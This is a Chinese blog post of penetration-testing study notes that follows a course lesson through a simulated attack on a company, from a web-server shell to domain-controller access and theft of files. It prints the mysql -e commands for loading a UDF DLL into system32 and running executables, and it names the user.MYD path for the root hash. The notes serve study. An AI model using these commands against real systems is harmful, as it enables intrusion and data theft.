跟随micropoor前辈之渗透笔记(3)

本文详细解析了模拟诉求攻击的过程,从获取目标公司信息到利用MSF提权,再到通过域控权限获取个人主机文件。介绍了主机信息搜集、数据库密码读取及利用MySQL执行命令的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

此笔记的原书来源于Micropoor前辈的Micro8,这里我仅对我感兴趣的地方做些自己的学习笔记,开头会注明来自哪几节课。
以下来自第8节课
由于师傅写的已经很清楚了,这里只做思路和其他介绍

模拟诉求攻击情况介绍

事件过程:拿到该公司明年计划,拿到该公司今年报表,并且摸清该公司组织架构。盈利情 况。
思路:拿到一个目标主站(win08 R2)shell,搜集信息,然后拿下第二台服务器,搜集信息,读取root,msf提权,拿到域控和跨段服务器权限后,跳到个人主机获取文件。

思路

主机信息,端口,任务列表(tasklist,注意重点敏感任务),账户搜集,重要路径搜集(为未来可能需要dump file做准备),数据库等密码搜集(为未来可能需要碰撞做准备),杀软搜集,管理员习惯等

拿到第二台服务器后,搜集完信息,发现有mysql服务,读取root信息
mysql的root hash:MySQL\MySQL Server 5.0\data\mysql\user.MYD
然后写入shell
在实际情况中,交互的shell下运行mysql -uroot -pxxx无法继续交互,需要参数e解决这个 问题。

mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);" 
mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));"
如果限制上传大小同样可以hex解决上传大小问题。
mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\xxxx.dll';" mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'" 
mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"

利用msf执行命令,转发等,拿到域控权限后,得到跨段服务器权限,进而打到个人机进行文件获取

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值